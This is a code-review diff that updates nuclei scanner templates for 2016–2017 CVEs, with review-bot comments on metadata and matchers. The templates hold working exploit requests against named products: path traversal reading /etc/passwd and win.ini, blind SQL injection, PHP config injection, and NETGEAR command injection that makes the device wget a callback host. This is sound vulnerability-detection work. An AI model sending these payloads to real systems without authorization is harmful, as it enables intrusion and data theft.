7.5 cve-id: CVE-2016-10367 cwe-id: CWE-22 + epss-score: 0.00521 + epss-percentile: 0.76355 + cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: + verified: true + max-request: 1 + vendor: opsview + product: opsview shodan-query: title:"Opsview" - verified: "true" - tags: cve,cve2016,opsview,lfi + tags: cve2016,cve,opsview,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -34,5 +45,4 @@ requests: - type: status status: - 404 - -# Enhanced by mp on 2022/08/03 +# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
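Review bot: The two references added, `https://github.com/ARPSyndicate/cvemon` and `https://github.com/ARPSyndicate/kenzer-templates`, are template-aggregator repositories rather than advisories or vendor notices, so they tell a reader of this template nothing the Trustwave and NVD links above them do not; keeping `reference` to primary sources keeps the field useful for triage. The `cpe` pins `opsview:4.5.0:*:*:*:pro` while the description lists fixed versions across 5.1, 5.0 and 4.6 as well, so a wildcard version would express the affected range better.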
diff --git a/nuclei-templates/CVE-2016/CVE-2016-10924.yaml b/nuclei-templates/CVE-2016/cve-2016-10924.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-10924.yaml rename to nuclei-templates/CVE-2016/cve-2016-10924.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-10940.yaml b/nuclei-templates/CVE-2016/cve-2016-10940.yaml index 3898a7c31a..9cb20d013b 100644 --- a/nuclei-templates/CVE-2016/cve-2016-10940.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-10940.yaml @@ -5,19 +5,32 @@ info: author: cckuailong,daffainfo severity: high description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor. reference: - https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6 - https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ - https://nvd.nist.gov/vuln/detail/CVE-2016-10940 - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/ + - https://wordpress.org/plugins/zm-gallery/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2016-10940 cwe-id: CWE-89 - tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated + epss-score: 0.00776 + epss-percentile: 0.80947 + cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 3 + vendor: zm-gallery_project + product: zm-gallery + framework: wordpress + tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 
@@ -27,17 +40,13 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: @@ -46,5 +55,4 @@ requests: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and - -# Enhanced by mp on 2022/04/12 +# digest: 490a004630440220699b403999a44dfa1c0a95c442149578cb0dba8769c29aff63008cc829004d2202201090107521d760927c5f1134bbceda7facb495a7c6291a6a0669d3ca7a6832ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/cve-2016-10960.yaml b/nuclei-templates/CVE-2016/cve-2016-10960.yaml new file mode 100644 index 0000000000..7d70ef5104 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-10960.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2016-10960 + +info: + name: wSecure Lite < 2.4 - Remote Code Execution (RCE) + author: daffainfo + severity: high + description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. + reference: + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' + + matchers-condition: and + matchers: + - type: word + words: + - "Nuclei: CVE-2016-10960" + condition: and + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1555.yaml b/nuclei-templates/CVE-2016/cve-2016-1555.yaml new file mode 100644 index 0000000000..b90433e242 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-1555.yaml 
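Review bot: The POST body `wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="` is an `update` action whose payload closes the config class and opens a new `WSecureConfig2`, which from its shape appears to be written into the plugin's `wsecure-config.php` on the target; a positive match therefore leaves a persistent modification behind rather than only reading state. The template should carry the `intrusive` tag alongside `rce`, and a comment above `http:` such as `# state-changing: the update action writes the marker into the plugin config` would warn operators before it is scheduled. The `condition: and` on a single-word matcher is a no-op and can be dropped.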
@@ -0,0 +1,47 @@ +id: CVE-2016-1555 + +info: + name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection + author: gy741 + severity: critical + description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. + reference: + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 + - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic + - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-1555 + cwe-id: CWE-77 + epss-score: 0.97373 + epss-percentile: 0.99898 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev + +http: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
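Review bot: This file re-creates the template that the same patch deletes as `nuclei-templates/CVE-2016/CVE-2016-1555.yaml` earlier in this diff, differing only in filename case plus the metadata refresh, so git records a delete and an add and the template's history is cut; the same happens for cve-2016-6277 further down. The patch also renames in both directions (`cve-2016-2004.yaml` → `CVE-2016-2004.yaml` but `CVE-2016-0957.yaml` → `cve-2016-0957.yaml`), leaving the directory with mixed-case ids; settling on one convention and letting the rename be recorded as such would stop this churn on every "Auto Updated" run. Note also that the vector drops from the deleted file's `S:C`/10.0 to `S:U`/9.8 without comment.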
diff --git a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml b/nuclei-templates/CVE-2016/cve-2016-2389.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-2389.yaml rename to nuclei-templates/CVE-2016/cve-2016-2389.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-3081.yaml b/nuclei-templates/CVE-2016/cve-2016-3081.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-3081.yaml rename to nuclei-templates/CVE-2016/cve-2016-3081.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-3978.yaml b/nuclei-templates/CVE-2016/cve-2016-3978.yaml index ac3ab10ad8..9c1dd44d28 100644 --- a/nuclei-templates/CVE-2016/cve-2016-3978.yaml +++ b/nuclei-templates/CVE-2016/cve-2016-3978.yaml 
@@ -1,27 +1,41 @@ id: CVE-2016-3978 info: - name: FortiOS (Fortinet) - Open Redirect and XSS + name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting author: 0x_Akoko severity: medium - description: The Web User Interface (WebUI) in FortiOS 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting (XSS) attacks via the "redirect" parameter to "login." + description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, phishing attacks, and potential data theft. + remediation: | + Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. 
reference: - - https://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - tags: cve,cve2016,redirect,fortinet,fortios + - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 + epss-score: 0.00217 + epss-percentile: 0.59667 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,cve,redirect,fortinet,fortios,seclists -requests: +http: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.example.com' + - '{{BaseURL}}/login?redir=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2016/CVE-2016-4977.yaml b/nuclei-templates/CVE-2016/cve-2016-4977.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-4977.yaml rename to nuclei-templates/CVE-2016/cve-2016-4977.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-5649.yaml b/nuclei-templates/CVE-2016/cve-2016-5649.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-5649.yaml rename to nuclei-templates/CVE-2016/cve-2016-5649.yaml 
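Review bot: This hunk normalizes `cvss-score: 6.10` to `6.1`, but four new files added by the same patch (`cve-2016-1000133`, `-1000134`, `-1000141`, `-1000142`) still carry `6.10`, and `cve-2016-6277` and `cve-2016-10960` carry `8.80`; whatever normalized the score here should be applied to those too so the field stays a plain number. The `cpe` added pins `fortios:5.0.0` while the description covers 5.0.x, 5.2.x and 5.4.x, so a wildcard version would express the range. The hunk starts on the previous line.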
diff --git a/nuclei-templates/CVE-2016/cve-2016-6277.yaml b/nuclei-templates/CVE-2016/cve-2016-6277.yaml new file mode 100644 index 0000000000..fd2ae09625 --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-6277.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-6277 + +info: + name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE + author: pikpikcu + severity: high + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cve2016,netgear,rce,iot + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-8527.yaml b/nuclei-templates/CVE-2016/cve-2016-8527.yaml similarity index 100% rename from nuclei-templates/CVE-2016/CVE-2016-8527.yaml rename to nuclei-templates/CVE-2016/cve-2016-8527.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml index 533de8e908..cff57e655a 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000029.yaml 
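Review bot: The new `cve-2016-6277.yaml` is an older revision of the `CVE-2016-6277.yaml` deleted earlier in this patch, not an update: it drops the kb.cert.org and second sj-vs.net references, keeps the pre-v3 `requests:` key, writes the score as `8.80`, and loosens the passwd regex to `root:.*:0:0` where the deleted file used `root:.*:0:0:` and the CVE-2017-1000029 hunk below uses the anchored `root:[x*]:0:0:`. If the intent is a case-only rename, the deleted file's content should be carried over; a match on `root:.*:0:0` alone also fires on pages that merely echo a group/uid string.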
@@ -1,27 +1,44 @@ id: CVE-2017-1000029 + info: - name: GlassFish Server Open Source Edition 3.0.1 - LFI + name: Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion author: 0x_Akoko severity: high - description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication. + description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. 
reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - - https://www.cvedetails.com/cve/CVE-2017-1000029 + - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000029 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-1000029 cwe-id: CWE-200 + epss-score: 0.00387 + epss-percentile: 0.70348 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* + metadata: + max-request: 1 + vendor: oracle + product: glassfish_server tags: cve,cve2017,glassfish,oracle,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/resource/file%3a///etc/passwd/" + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:[x*]:0:0:" + - type: status status: - 200 +# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml index ddc3c1f4e5..9ea899aa99 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000163.yaml 
@@ -1,28 +1,41 @@ id: CVE-2017-1000163 + info: - name: The Phoenix Framework versions 1.0.0 - Open redirect + name: Phoenix Framework - Open Redirect author: 0x_Akoko severity: medium - description: The Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 are vulnerable to unvalidated URL redirection, which may result in phishing or social engineering attacks. + description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. + remediation: | + Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: - https://elixirforum.com/t/security-releases-for-phoenix/4143 - - https://www.cvedetails.com/cve/CVE-2017-1000163 - https://vuldb.com/?id.109587 + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000163 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-1000163 cwe-id: CWE-601 - tags: cve,cve2017,redirect,phoenix + epss-score: 0.00186 + epss-percentile: 0.55009 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: phoenixframework + product: phoenix + tags: cve,cve2017,redirect,phoenix,phoenixframework -requests: +http: - method: GET - path: - '{{BaseURL}}/?redirect=/\interact.sh' matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' - part: header +# digest: 4a0a00473045022066d0d9509969142bbfbcf0eb417da56845541044c0685547d194ebb62e0364e0022100eaeac8289ca457b4603e6babedbbca92bed9163d0b07be773a03a4e1c82b5b82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
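Review bot: The matcher cannot fire on a verbatim echo of its own payload: the request sends `redirect=/\interact.sh`, but the header regex only admits `https?://` or `//` before the host, so a response of `Location: /\interact.sh` — what a path-only redirect would look like if the server passes the value through unchanged — does not match, and only servers that normalize the backslash to `//` would be detected. Other templates in this same commit (CVE-2016-3978, CVE-2017-12138) already use the stronger alternation that accepts the `/\` forms, so the same expression should be used here: `- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'`. I have not verified how each affected Phoenix release writes the header, so the exact echo form is an inference.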
diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml index 1885fac00b..dac660480f 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-1000486.yaml @@ -1,20 +1,22 @@ id: CVE-2017-1000486 + info: - name: Primetek Primefaces 5.x - Remote Code Execution + name: Primetek Primefaces 5.x EL Injection - RCE author: Moritz Nentwig severity: critical - description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 + tags: cve,cve2017,primetek,rce,injection classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2017-1000486 cwe-id: CWE-326 - tags: cve,cve2017,primetek,rce,injection + requests: - raw: - | @@ -25,10 +27,9 @@ requests: Accept-Encoding: gzip, deflate pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D + matchers: - type: word words: - 'Mogwailabs: CHECKCHECK' part: header - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml b/nuclei-templates/CVE-2017/CVE-2017-10075.yaml index d5bc0d6f77..3083d00632 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-10075.yaml 
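Review bot: This hunk moves the template backwards relative to the rest of the commit: `cvss-score` is rewritten from `9.8` to `9.80` while every other hunk here normalizes scores to one decimal (`6.10` → `6.1`), and the block stays on the `requests:` key although the neighbouring templates are migrated to `http:`. If the auto-updater is picking an older upstream copy of this file, the source ordering should be fixed rather than committing the regression; otherwise keep `cvss-score: 9.8` and rename the request block to `http:`. The raw request body and matcher are otherwise unchanged.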
@@ -1,19 +1,16 @@ id: CVE-2017-10075 info: - name: Oracle Content Server Cross-Site Scripting + name: Oracle Content Server XSS author: madrobot severity: high - description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. - reference: - - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 + description: The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html + tags: cve,cve2017,xss,oracle classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.2 + cvss-score: 8.20 cve-id: CVE-2017-10075 - tags: cve,cve2017,xss,oracle requests: - method: GET @@ -30,5 +27,3 @@ requests: words: - "" part: body - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2017/CVE-2017-11165.yaml b/nuclei-templates/CVE-2017/CVE-2017-11165.yaml index b1e62f3d63..5bdccda632 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-11165.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-11165.yaml 
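Review bot: On the rendered new side of the second hunk the body matcher is `words: - ""`; if that empty string is really what the file now holds and not an artefact of this rendering, an empty `word` matches every response body and the template will report the XSS on any host that serves the page, so the expected reflected payload must be restored as the word. The first hunk also drops the affected-version list (`11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0`) from the description and removes the NVD and securitytracker references, which weakens triage with no benefit; the fuller description and reference list from the old side should be kept. `cvss-score: 8.20` likewise reverses the one-decimal normalization applied elsewhere in this commit.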
@@ -6,6 +6,10 @@ info: severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive data, potentially compromising the confidentiality of the system. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/45094 - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html @@ -16,12 +20,18 @@ info: cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 + epss-score: 0.94336 + epss-percentile: 0.99027 + cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: datataker + product: dt80_dex_firmware shodan-query: http.title:"datataker" - verified: "true" - tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure + tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/services/getFile.cmd?userfile=config.xml" @@ -43,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-11512.yaml b/nuclei-templates/CVE-2017/CVE-2017-11512.yaml new file mode 100644 index 0000000000..8b2924e2e0 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-11512.yaml 
@@ -0,0 +1,50 @@ +id: CVE-2017-11512 + +info: + name: ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: | + ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage. + remediation: | + Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. + reference: + - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html + - https://www.tenable.com/security/research/tra-2017-31 + - https://nvd.nist.gov/vuln/detail/CVE-2017-11512 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-11512 + cwe-id: CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99794 + cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: manageengine + product: servicedesk + shodan-query: http.title:"ManageEngine" + tags: cve,cve2017,manageengine,lfr,unauth,tenable + +http: + - method: GET + path: + - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' + - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ 
